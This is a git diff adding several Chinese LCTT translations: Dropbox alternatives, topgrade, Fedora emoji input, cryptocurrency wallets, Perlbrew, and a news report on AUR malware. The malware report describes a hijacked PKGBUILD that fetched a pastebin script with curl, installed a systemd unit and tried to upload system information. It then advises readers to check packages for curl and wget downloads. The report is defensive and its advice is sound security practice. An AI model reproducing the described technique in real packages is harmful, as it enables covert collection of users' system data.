|
||||||
|
使用 ownCloud,你可以通过 Linux、MacOS 或 Windows 的客户端和安卓、iOS 的移动应用程序来同步和访问文件。你还可以通过带有密码保护的链接分享给其他人来协作或者上传和下载。数据传输通过端到端加密(E2EE)和 SSL 加密来保护安全。你还可以通过使用它的 [市场][4] 中的各种各样的第三方应用来扩展它的功能。当然,它也提供付费的、商业许可的企业版本。
|
||||||
|
|
||||||
|
ownCloud 提供了详尽的[文档][5],包括安装指南和针对用户、管理员、开发者的手册。你可以从 GitHub 仓库中获取它的[源码][6]。
|
||||||
|
|
||||||
|
### NextCloud
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/nextcloud.png)
|
||||||
|
|
||||||
|
[NextCloud][7] 在 2016 年从 ownCloud 分裂出来,并且具有很多相同的功能。 NextCloud 以它的高安全性和法规遵从性作为它的一个独特的[推崇的卖点][8]。它具有 HIPAA (医疗) 和 GDPR (隐私)法规遵从功能,并提供广泛的数据策略约束、加密、用户管理和审核功能。它还在传输和存储期间对数据进行加密,并且集成了移动设备管理和身份验证机制 (包括 LDAP/AD、单点登录、双因素身份验证等)。
|
||||||
|
|
||||||
|
像本文列表里的其他应用一样, NextCloud 是自托管的,但是如果你不想在自己的 Linux 上安装 NextCloud 服务器,该公司与几个[提供商][9]达成了伙伴合作,提供安装和托管,并销售服务器、设备和服务支持。在[市场][10]中提供了大量的apps 来扩展它的功能。
|
||||||
|
|
||||||
|
NextCloud 的[文档][11]为用户、管理员和开发者提供了详细的信息,并且它的论坛、IRC 频道和社交媒体提供了基于社区的支持。如果你想贡献或者获取它的源码、报告一个错误、查看它的 AGPLv3 许可,或者想了解更多,请访问它的[GitHub 项目主页][12]。
|
||||||
|
|
||||||
|
### Seafile
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/seafile.png)
|
||||||
|
|
||||||
|
与 ownCloud 或 NextCloud 相比,[Seafile][13] 或许没有花里胡哨的卖点(app 生态),但是它能完成任务。实质上, 它充当了 Linux 服务器上的虚拟驱动器,以扩展你的桌面存储,并允许你使用密码保护和各种级别的权限(即只读或读写) 有选择地共享文件。
|
||||||
|
|
||||||
|
它的协作功能包括文件夹权限控制,密码保护的下载链接和像 Git 一样的版本控制和记录。文件使用双因素身份验证、文件加密和 AD/LDAP 集成进行保护,并且可以从 Windows、MacOS、Linux、iOS 或 Android 设备进行访问。
|
||||||
|
|
||||||
|
更多详细信息, 请访问 Seafile 的 [GitHub 仓库][14]、[服务手册][15]、[wiki][16] 和[论坛][17]。请注意, Seafile 的社区版在 [GPLv2][18] 下获得许可,但其专业版不是开源的。
|
||||||
|
|
||||||
|
### OnionShare
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/onionshare.png)
|
||||||
|
|
||||||
|
[OnionShare][19] 是一个很酷的应用:如果你想匿名,它允许你安全地共享单个文件或文件夹。不需要设置或维护服务器,所有你需要做的就是[下载和安装][20],无论是在 MacOS, Windows 还是 Linux 上。文件始终在你自己的计算机上; 当你共享文件时,OnionShare 创建一个 web 服务器,使其可作为 Tor 洋葱服务访问,并生成一个不可猜测的 .onion URL,这个 URL 允许收件人通过 [Tor 浏览器][21]获取文件。
|
||||||
|
|
||||||
|
你可以设置文件共享的限制,例如限制可以下载的次数或使用自动停止计时器,这会设置一个严格的过期日期/时间,超过这个期限便不可访问(即使尚未访问该文件)。
|
||||||
|
|
||||||
|
OnionShare 在 [GPLv3][22] 之下被许可;有关详细信息,请查阅其 [GitHub 仓库][22],其中还包括[文档][23],介绍了这个易用的文件共享软件的特点。
|
||||||
|
|
||||||
|
### Pydio Cells
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/pydiochat.png)
|
||||||
|
|
||||||
|
[Pydio Cells][24] 在 2018 年 5 月推出了稳定版,是对 Pydio 共享应用程序的核心服务器代码的彻底大修。由于 Pydio 的基于 PHP 的后端的限制,开发人员决定用 Go 服务器语言和微服务体系结构重写后端。(前端仍然是基于 PHP 的)。
|
||||||
|
|
||||||
|
Pydio Cells 包括通常的共享和版本控制功能,以及应用程序中的消息接受、移动应用程序(Android 和 iOS),以及一种社交网络风格的协作方法。安全性包括基于 OpenID 连接的身份验证、rest 加密、安全策略等。企业发行版中包含着高级功能,但在社区(家庭)版本中,对于大多数中小型企业和家庭用户来说,依然是足够的。
|
||||||
|
|
||||||
|
您可以 在 Linux 和 MacOS 里[下载][25] Pydio Cells。有关详细信息, 请查阅 [文档常见问题][26]、[源码库][27] 和 [AGPLv3 许可证][28]
|
||||||
|
|
||||||
|
### 其他
|
||||||
|
|
||||||
|
如果以上选择不能满足你的需求,你可能想考虑其他开源的文件共享型应用。
|
||||||
|
|
||||||
|
* 如果你的主要目的是在设备间同步文件而不是分享文件,考察一下 [Syncthing][29]。
|
||||||
|
* 如果你是一个 Git 的粉丝而不需要一个移动应用。你可能更喜欢 [SparkleShare][30]。
|
||||||
|
* 如果你主要想要一个地方聚合所有你的个人数据, 看看 [Cozy][31]。
|
||||||
|
* 如果你想找一个轻量级的或者专注于文件共享的工具,考察一下 [Scott Nesbitt's review][32]——一个罕为人知的工具。
|
||||||
|
|
||||||
|
哪个是你最喜欢的开源文件共享应用?在评论中让我们知悉。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/alternatives/dropbox
|
||||||
|
|
||||||
|
作者:[Opensource.com][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[distant1219](https://github.com/distant1219)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com
|
||||||
|
[1]:https://opensource.com/open-source-way
|
||||||
|
[2]:https://owncloud.org/
|
||||||
|
[3]:https://www.gnu.org/licenses/agpl-3.0.html
|
||||||
|
[4]:https://marketplace.owncloud.com/
|
||||||
|
[5]:https://doc.owncloud.com/
|
||||||
|
[6]:https://github.com/owncloud
|
||||||
|
[7]:https://nextcloud.com/
|
||||||
|
[8]:https://nextcloud.com/secure/
|
||||||
|
[9]:https://nextcloud.com/providers/
|
||||||
|
[10]:https://apps.nextcloud.com/
|
||||||
|
[11]:https://nextcloud.com/support/
|
||||||
|
[12]:https://github.com/nextcloud
|
||||||
|
[13]:https://www.seafile.com/en/home/
|
||||||
|
[14]:https://github.com/haiwen/seafile
|
||||||
|
[15]:https://manual.seafile.com/
|
||||||
|
[16]:https://seacloud.cc/group/3/wiki/
|
||||||
|
[17]:https://forum.seafile.com/
|
||||||
|
[18]:https://github.com/haiwen/seafile/blob/master/LICENSE.txt
|
||||||
|
[19]:https://onionshare.org/
|
||||||
|
[20]:https://onionshare.org/#downloads
|
||||||
|
[21]:https://www.torproject.org/
|
||||||
|
[22]:https://github.com/micahflee/onionshare/blob/develop/LICENSE
|
||||||
|
[23]:https://github.com/micahflee/onionshare/wiki
|
||||||
|
[24]:https://pydio.com/en
|
||||||
|
[25]:https://pydio.com/download/
|
||||||
|
[26]:https://pydio.com/en/docs/faq
|
||||||
|
[27]:https://github.com/pydio/cells
|
||||||
|
[28]:https://github.com/pydio/pydio-core/blob/develop/LICENSE
|
||||||
|
[29]:https://syncthing.net/
|
||||||
|
[30]:http://www.sparkleshare.org/
|
||||||
|
[31]:https://cozy.io/en/
|
||||||
|
[32]:https://opensource.com/article/17/3/file-sharing-tools
|
@ -0,0 +1,120 @@
|
|||||||
|
如何在 Linux 中使用一个命令升级所有软件
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-720x340.png)
|
||||||
|
|
||||||
|
众所周知,让我们的 Linux 系统保持最新状态会用到多种包管理器。比如说,在 Ubuntu 中,你无法使用 `sudo apt update` 和 `sudo apt upgrade` 命令升级所有软件。此命令仅升级使用 APT 包管理器安装的应用程序。你有可能使用 `cargo`、[pip][1]、`npm`、`snap` 、`flatpak` 或 [Linuxbrew][2] 包管理器安装了其他软件。你需要使用相应的包管理器才能使它们全部更新。
|
||||||
|
|
||||||
|
再也不用这样了!跟 `topgrade` 打个招呼,这是一个可以一次性升级系统中所有软件的工具。
|
||||||
|
|
||||||
|
你无需运行每个包管理器来更新包。这个 `topgrade` 工具通过检测已安装的软件包、工具、插件并运行相应的软件包管理器来更新 Linux 中的所有软件,用一条命令解决了这个问题。它是自由而开源的,使用 **rust 语言**编写。它支持 GNU/Linux 和 Mac OS X.
|
||||||
|
|
||||||
|
### 在 Linux 中使用一个命令升级所有软件
|
||||||
|
|
||||||
|
`topgrade` 存在于 AUR 中。因此,你可以在任何基于 Arch 的系统中使用 [Yay][3] 助手程序安装它。
|
||||||
|
|
||||||
|
```
|
||||||
|
$ yay -S topgrade
|
||||||
|
```
|
||||||
|
|
||||||
|
在其他 Linux 发行版上,你可以使用 `cargo` 包管理器安装 `topgrade`。要安装 cargo 包管理器,请参阅以下链接:
|
||||||
|
|
||||||
|
- [在 Linux 安装 rust 语言][12]
|
||||||
|
|
||||||
|
然后,运行以下命令来安装 `topgrade`。
|
||||||
|
|
||||||
|
```
|
||||||
|
$ cargo install topgrade
|
||||||
|
```
|
||||||
|
|
||||||
|
安装完成后,运行 `topgrade` 以升级 Linux 系统中的所有软件。
|
||||||
|
|
||||||
|
```
|
||||||
|
$ topgrade
|
||||||
|
```
|
||||||
|
|
||||||
|
一旦调用了 `topgrade`,它将逐个执行以下任务。如有必要,系统会要求输入 root/sudo 用户密码。
|
||||||
|
|
||||||
|
1、 运行系统的包管理器:
|
||||||
|
|
||||||
|
* Arch:运行 `yay` 或者回退到 [pacman][4]
|
||||||
|
* CentOS/RHEL:运行 `yum upgrade`
|
||||||
|
* Fedora :运行 `dnf upgrade`
|
||||||
|
* Debian/Ubuntu:运行 `apt update` 和 `apt dist-upgrade`
|
||||||
|
* Linux/macOS:运行 `brew update` 和 `brew upgrade`
|
||||||
|
|
||||||
|
2、 检查 Git 是否跟踪了以下路径。如果有,则拉取它们:
|
||||||
|
|
||||||
|
* `~/.emacs.d` (无论你使用 Spacemacs 还是自定义配置都应该可用)
|
||||||
|
* `~/.zshrc`
|
||||||
|
* `~/.oh-my-zsh`
|
||||||
|
* `~/.tmux`
|
||||||
|
* `~/.config/fish/config.fish`
|
||||||
|
* 自定义路径
|
||||||
|
|
||||||
|
3、 Unix:运行 `zplug` 更新
|
||||||
|
|
||||||
|
4、 Unix:使用 TPM 升级 `tmux` 插件
|
||||||
|
|
||||||
|
5、 运行 `cargo install-update`
|
||||||
|
|
||||||
|
6、 升级 Emacs 包
|
||||||
|
|
||||||
|
7、 升级 Vim 包。对以下插件框架均可用:
|
||||||
|
|
||||||
|
* NeoBundle
|
||||||
|
* [Vundle][5]
|
||||||
|
* Plug
|
||||||
|
|
||||||
|
8、 升级 [npm][6] 全局安装的包
|
||||||
|
|
||||||
|
9、 升级 Atom 包
|
||||||
|
|
||||||
|
10、 升级 [Flatpak][7] 包
|
||||||
|
|
||||||
|
11、 升级 [snap][8] 包
|
||||||
|
|
||||||
|
12、 Linux:运行 `fwupdmgr` 显示固件升级。 (仅查看。实际不会执行升级)
|
||||||
|
|
||||||
|
13、 运行自定义命令。
|
||||||
|
|
||||||
|
最后,`topgrade` 将运行 `needrestart` 以重新启动所有服务。在 Mac OS X 中,它会升级 App Store 程序。
|
||||||
|
|
||||||
|
我的 Ubuntu 18.04 LTS 测试环境的示例输出:
|
||||||
|
|
||||||
|
![][10]
|
||||||
|
|
||||||
|
好处是如果一个任务失败,它将自动运行下一个任务并完成所有其他后续任务。最后,它将显示摘要,其中包含运行的任务数量,成功的数量和失败的数量等详细信息。
|
||||||
|
|
||||||
|
![][11]
|
||||||
|
|
||||||
|
**建议阅读:**
|
||||||
|
|
||||||
|
就个人而言,我喜欢创建一个像 `topgrade` 程序的想法,并使用一个命令升级使用各种包管理器安装的所有软件。我希望你也觉得它有用。还有更多的好东西。敬请关注!
|
||||||
|
|
||||||
|
干杯!
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.ostechnix.com/how-to-upgrade-everything-using-a-single-command-in-linux/
|
||||||
|
|
||||||
|
作者:[SK][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.ostechnix.com/author/sk/
|
||||||
|
[1]:https://www.ostechnix.com/manage-python-packages-using-pip/
|
||||||
|
[2]:https://www.ostechnix.com/linuxbrew-common-package-manager-linux-mac-os-x/
|
||||||
|
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
|
||||||
|
[4]:https://www.ostechnix.com/getting-started-pacman/
|
||||||
|
[5]:https://www.ostechnix.com/manage-vim-plugins-using-vundle-linux/
|
||||||
|
[6]:https://www.ostechnix.com/manage-nodejs-packages-using-npm/
|
||||||
|
[7]:https://www.ostechnix.com/flatpak-new-framework-desktop-applications-linux/
|
||||||
|
[8]:https://www.ostechnix.com/install-snap-packages-arch-linux-fedora/
|
||||||
|
[9]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
|
||||||
|
[10]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-1.png
|
||||||
|
[11]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-2.png
|
||||||
|
[12]:https://www.ostechnix.com/install-rust-programming-language-in-linux/
|
@ -0,0 +1,67 @@
|
|||||||
|
在 Fedora 28 Workstation 使用 emoji 加速输入
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://fedoramagazine.org/wp-content/uploads/2018/07/emoji-typing-816x345.jpg)
|
||||||
|
|
||||||
|
Fedora 28 Workstation 添加了一个功能允许你使用键盘快速搜索、选择和输入 emoji。emoji,这种可爱的表意文字是 Unicode 的一部分,在消息传递中使用得相当广泛,特别是在移动设备上。你可能听过这样的成语:“一图胜千言”。这正是 emoji 所提供的:简单的图像供你在交流中使用。Unicode 的每个版本都增加了更多 emoji,在最近的 Unicode 版本中添加了 200 多个 emoji。本文向你展示如何使它们在你的 Fedora 系统中易于使用。
|
||||||
|
|
||||||
|
很高兴看到 emoji 的数量在增长。但与此同时,它带来了如何在计算设备中输入它们的挑战。许多人已经将这些符号用于移动设备或社交网站中的输入。
|
||||||
|
|
||||||
|
[**编者注:**本文是对此主题以前发表过的文章的更新]。
|
||||||
|
|
||||||
|
### 在 Fedora 28 Workstation 上启用 emoji 输入
|
||||||
|
|
||||||
|
新的 emoji 输入法默认出现在 Fedora 28 Workstation 中。要使用它,必须使用“区域和语言设置”对话框启用它。从 Fedora Workstation 设置打开“区域和语言”对话框,或在“概要”中搜索它。
|
||||||
|
|
||||||
|
[![Region & Language settings tool][1]][2]
|
||||||
|
|
||||||
|
选择 `+` 控件添加输入源。出现以下对话框:
|
||||||
|
|
||||||
|
[![Adding an input source][3]][4]
|
||||||
|
|
||||||
|
选择最后选项(三个点)来完全展开选择。然后,在列表底部找到“Other”并选择它:
|
||||||
|
|
||||||
|
[![Selecting other input sources][5]][6]
|
||||||
|
|
||||||
|
在下面的对话框中,找到 “Typing Booster” 选项并选择它:
|
||||||
|
|
||||||
|
[![][7]][8]
|
||||||
|
|
||||||
|
这个高级输入法由 iBus 在背后支持。该高级输入法可通过列表右侧的齿轮图标在列表中识别。
|
||||||
|
|
||||||
|
输入法下拉菜单自动出现在 GNOME Shell 顶部栏中。确认你的默认输入法 —— 在此示例中为英语(美国) - 被选为当前输入法,你就可以输入了。
|
||||||
|
|
||||||
|
[![Input method dropdown in Shell top bar][9]][10]
|
||||||
|
|
||||||
|
### 使用新的表情符号输入法
|
||||||
|
|
||||||
|
现在 emoji 输入法启用了,按键盘快捷键 `Ctrl+Shift+E` 搜索 emoji。将出现一个弹出对话框,你可以在其中输入搜索词,例如 “smile” 来查找匹配的符号。
|
||||||
|
|
||||||
|
[![Searching for smile emoji][11]][12]
|
||||||
|
|
||||||
|
使用箭头键翻页列表。然后按回车进行选择,字形将替换输入内容。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://fedoramagazine.org/boost-typing-emoji-fedora-28-workstation/
|
||||||
|
|
||||||
|
作者:[Paul W. Frields][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://fedoramagazine.org/author/pfrields/
|
||||||
|
[1]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41-1024x718.png
|
||||||
|
[2]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41.png
|
||||||
|
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46-1024x839.png
|
||||||
|
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46.png
|
||||||
|
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15-1024x839.png
|
||||||
|
[6]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15.png
|
||||||
|
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41-1024x839.png
|
||||||
|
[8]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41.png
|
||||||
|
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24-300x244.png
|
||||||
|
[10]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24.png
|
||||||
|
[11]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31-290x300.png
|
||||||
|
[12]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31.png
|
@ -0,0 +1,40 @@
|
|||||||
|
在 Arch 用户仓库(AUR)中发现恶意软件
|
||||||
|
======
|
||||||
|
|
||||||
|
7 月 7 日,有一个 AUR 软件包被改入了一些恶意代码,提醒 [Arch Linux][1] 用户(以及一般的 Linux 用户)在安装之前应该尽可能检查所有由用户生成的软件包。
|
||||||
|
|
||||||
|
[AUR][3](即 Arch(Linux)用户仓库)包含包描述,也称为 PKGBUILD,它使得从源代码编译包变得更容易。虽然这些包非常有用,但它们永远不应被视为安全的,并且用户应尽可能在使用之前检查其内容。毕竟,AUR 在网页中以粗体显示 “**AUR 包是用户制作的内容。任何使用该提供的文件的风险由你自行承担。**”
|
||||||
|
|
||||||
|
这次[发现][4]包含恶意代码的 AUR 包证明了这一点。[acroread][5] 于 7 月 7 日(看起来它以前是“孤儿”,意思是它没有维护者)被一位名为 “xeactor” 的用户修改,它包含了一行从 pastebin 使用 `curl` 下载脚本的命令。然后,该脚本下载了另一个脚本并安装了一个 systemd 单元以定期运行该脚本。
|
||||||
|
|
||||||
|
**看来有[另外两个][2] AUR 包以同样的方式被修改。所有违规软件包都已删除,并暂停了用于上传它们的用户帐户(它们注册在更新软件包的同一天)。**
|
||||||
|
|
||||||
|
这些恶意代码没有做任何真正有害的事情 —— 它只是试图上传一些系统信息,比如机器 ID、`uname -a` 的输出(包括内核版本、架构等)、CPU 信息、pacman 信息,以及 `systemctl list-units`(列出 systemd 单元信息)的输出到 pastebin.com。我说“试图”是因为第二个脚本中存在错误而没有实际上传系统信息(上传函数为 “upload”,但脚本试图使用其他名称 “uploader” 调用它)。
|
||||||
|
|
||||||
|
此外,将这些恶意脚本添加到 AUR 的人将脚本中的个人 Pastebin API 密钥以明文形式留下,再次证明他们真的不明白他们在做什么。(LCTT 译注:意即这是一个菜鸟“黑客”,还不懂得如何有经验地隐藏自己。)
|
||||||
|
|
||||||
|
尝试将此信息上传到 Pastebin 的目的尚不清楚,特别是原本可以上传更加敏感信息的情况下,如 GPG / SSH 密钥。
|
||||||
|
|
||||||
|
**更新:** Reddit用户 u/xanaxdroid_ [提及][6]同一个名为 “xeactor” 的用户也发布了一些加密货币挖矿软件包,因此他推测 “xeactor” 可能正计划添加一些隐藏的加密货币挖矿软件到 AUR([两个月][7]前的一些 Ubuntu Snap 软件包也是如此)。这就是 “xeactor” 可能试图获取各种系统信息的原因。此 AUR 用户上传的所有包都已删除,因此我无法检查。
|
||||||
|
|
||||||
|
**另一个更新:**你究竟应该在那些用户生成的软件包检查什么(如 AUR 中发现的)?情况各有不同,我无法准确地告诉你,但你可以从寻找任何尝试使用 `curl`、`wget`和其他类似工具下载内容的东西开始,看看他们究竟想要下载什么。还要检查从中下载软件包源的服务器,并确保它是官方来源。不幸的是,这不是一个确切的“科学做法”。例如,对于 Launchpad PPA,事情变得更加复杂,因为你必须懂得 Debian 如何打包,并且这些源代码是可以直接更改的,因为它托管在 PPA 中并由用户上传的。使用 Snap 软件包会变得更加复杂,因为在安装之前你无法检查这些软件包(据我所知)。在后面这些情况下,作为通用解决方案,我觉得你应该只安装你信任的用户/打包器生成的软件包。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.linuxuprising.com/2018/07/malware-found-on-arch-user-repository.html
|
||||||
|
|
||||||
|
作者:[Logix][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://plus.google.com/118280394805678839070
|
||||||
|
[1]:https://www.archlinux.org/
|
||||||
|
[2]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
|
||||||
|
[3]:https://aur.archlinux.org/
|
||||||
|
[4]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034152.html
|
||||||
|
[5]:https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc
|
||||||
|
[6]:https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/e21iugg/
|
||||||
|
[7]:https://www.linuxuprising.com/2018/05/malware-found-in-ubuntu-snap-store.html
|
94
published/20180710 6 open source cryptocurrency wallets.md
Normal file
94
published/20180710 6 open source cryptocurrency wallets.md
Normal file
@ -0,0 +1,94 @@
|
|||||||
|
6 个开源的数字货币钱包
|
||||||
|
======
|
||||||
|
|
||||||
|
> 想寻找一个可以存储和交易你的比特币、以太坊和其它数字货币的软件吗?这里有 6 个开源的软件可以选择。
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus_cash_register.jpg?itok=7NKVKuPa)
|
||||||
|
|
||||||
|
没有数字货币钱包,像比特币和以太坊这样的数字货币只不过是又一个空想罢了。这些钱包对于保存、发送、以及接收数字货币来说是必需的东西。
|
||||||
|
|
||||||
|
迅速成长的 [数字货币][1] 之所以是革命性的,都归功于它的去中心化,该网络中没有中央权威,每个人都享有平等的权力。开源技术是数字货币和 [区块链][2] 网络的核心所在。它使得这个充满活力的新兴行业能够从去中心化中获益 —— 比如,不可改变、透明和安全。
|
||||||
|
|
||||||
|
如果你正在寻找一个自由开源的数字货币钱包,请继续阅读,并开始去探索以下的选择能否满足你的需求。
|
||||||
|
|
||||||
|
### 1、 Copay
|
||||||
|
|
||||||
|
[Copay][3] 是一个能够很方便地存储比特币的开源数字货币钱包。这个软件以 [MIT 许可证][4] 发布。
|
||||||
|
|
||||||
|
Copay 服务器也是开源的。因此,开发者和比特币爱好者可以在服务器上部署他们自己的应用程序来完全控制他们的活动。
|
||||||
|
|
||||||
|
Copay 钱包能让你手中的比特币更加安全,而不是去信任不可靠的第三方。它允许你使用多重签名来批准交易,并且支持在同一个 app 钱包内支持存储多个独立的钱包。
|
||||||
|
|
||||||
|
Copay 可以在多种平台上使用,比如 Android、Windows、MacOS、Linux、和 iOS。
|
||||||
|
|
||||||
|
### 2、 MyEtherWallet
|
||||||
|
|
||||||
|
正如它的名字所示,[MyEtherWallet][5] (缩写为 MEW) 是一个以太坊钱包。它是开源的(遵循 [MIT 许可证][6])并且是完全在线的,可以通过 web 浏览器来访问它。
|
||||||
|
|
||||||
|
这个钱包的客户端界面非常简洁,它可以让你自信而安全地参与到以太坊区块链中。
|
||||||
|
|
||||||
|
### 3、 mSIGNA
|
||||||
|
|
||||||
|
[mSIGNA][7] 是一个功能强大的桌面版应用程序,用于在比特币网络上完成交易。它遵循 [MIT 许可证][8] 并且在 MacOS、Windows、和 Linux 上可用。
|
||||||
|
|
||||||
|
这个区块链钱包可以让你完全控制你存储的比特币。其中一些特性包括用户友好性、灵活性、去中心化的离线密钥生成能力、加密的数据备份,以及多设备同步功能。
|
||||||
|
|
||||||
|
### 4、 Armory
|
||||||
|
|
||||||
|
[Armory][9] 是一个在你的计算机上产生和保管比特币私钥的开源钱包(遵循 [GNU AGPLv3][10])。它通过使用冷存储和支持多重签名的能力增强了安全性。
|
||||||
|
|
||||||
|
使用 Armory,你可以在完全离线的计算机上设置一个钱包;你将通过<ruby>仅查看<rt>watch-only</rt></ruby>功能在因特网上查看你的比特币具体信息,这样有助于改善安全性。这个钱包也允许你去创建多个地址,并使用它们去完成不同的事务。
|
||||||
|
|
||||||
|
Armory 可用于 MacOS、Windows、和几个比较有特色的 Linux 平台上(包括树莓派)。
|
||||||
|
|
||||||
|
### 5、 Electrum
|
||||||
|
|
||||||
|
[Electrum][11] 是一个既对新手友好又具备专家功能的比特币钱包。它遵循 [MIT 许可证][12] 来发行。
|
||||||
|
|
||||||
|
Electrum 可以在你的本地机器上使用较少的资源来实现本地加密你的私钥,支持冷存储,并且提供多重签名能力。
|
||||||
|
|
||||||
|
它在各种操作系统和设备上都可以使用,包括 Windows、MacOS、Android、iOS 和 Linux,并且也可以在像 [Trezor][13] 这样的硬件钱包中使用。
|
||||||
|
|
||||||
|
### 6、 Etherwall
|
||||||
|
|
||||||
|
[Etherwall][14] 是第一款可以在桌面计算机上存储和发送以太坊的钱包。它是一个遵循 [GPLv3 许可证][15] 的开源钱包。
|
||||||
|
|
||||||
|
Etherwall 非常直观而且速度很快。更重要的是,它增加了你的私钥安全性,你可以在一个全节点或瘦节点上来运行它。它作为全节点客户端运行时,可以允许你在本地机器上下载整个以太坊区块链。
|
||||||
|
|
||||||
|
Etherwall 可以在 MacOS、Linux 和 Windows 平台上运行,并且它也支持 Trezor 硬件钱包。
|
||||||
|
|
||||||
|
### 智者之言
|
||||||
|
|
||||||
|
自由开源的数字钱包在让更多的人快速上手数字货币方面扮演至关重要的角色。
|
||||||
|
|
||||||
|
在你使用任何数字货币软件钱包之前,你一定要确保你的安全,而且一定要记住并完全遵循确保你的资金安全的最佳实践。
|
||||||
|
|
||||||
|
如果你喜欢的开源数字货币钱包不在以上的清单中,请在下面的评论区共享出你所知道的开源钱包。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/crypto-wallets
|
||||||
|
|
||||||
|
作者:[Dr.Michael J.Garbade][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/drmjg
|
||||||
|
[1]:https://www.liveedu.tv/guides/cryptocurrency/
|
||||||
|
[2]:https://opensource.com/tags/blockchain
|
||||||
|
[3]:https://copay.io/
|
||||||
|
[4]:https://github.com/bitpay/copay/blob/master/LICENSE
|
||||||
|
[5]:https://www.myetherwallet.com/
|
||||||
|
[6]:https://github.com/kvhnuke/etherwallet/blob/mercury/LICENSE.md
|
||||||
|
[7]:https://ciphrex.com/
|
||||||
|
[8]:https://github.com/ciphrex/mSIGNA/blob/master/LICENSE
|
||||||
|
[9]:https://www.bitcoinarmory.com/
|
||||||
|
[10]:https://github.com/etotheipi/BitcoinArmory/blob/master/LICENSE
|
||||||
|
[11]:https://electrum.org/#home
|
||||||
|
[12]:https://github.com/spesmilo/electrum/blob/master/LICENCE
|
||||||
|
[13]:https://trezor.io/
|
||||||
|
[14]:https://www.etherwall.com/
|
||||||
|
[15]:https://github.com/almindor/etherwall/blob/master/LICENSE
|
@ -1,15 +1,17 @@
|
|||||||
开始使用 Perlbrew
|
Perlbrew 入门
|
||||||
======
|
======
|
||||||
|
|
||||||
|
> 用 Perlbrew 在你系统上安装多个版本的 Perl。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/coffee_cafe_brew_laptop_desktop.jpg?itok=G-n1o1-o)
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/coffee_cafe_brew_laptop_desktop.jpg?itok=G-n1o1-o)
|
||||||
|
|
||||||
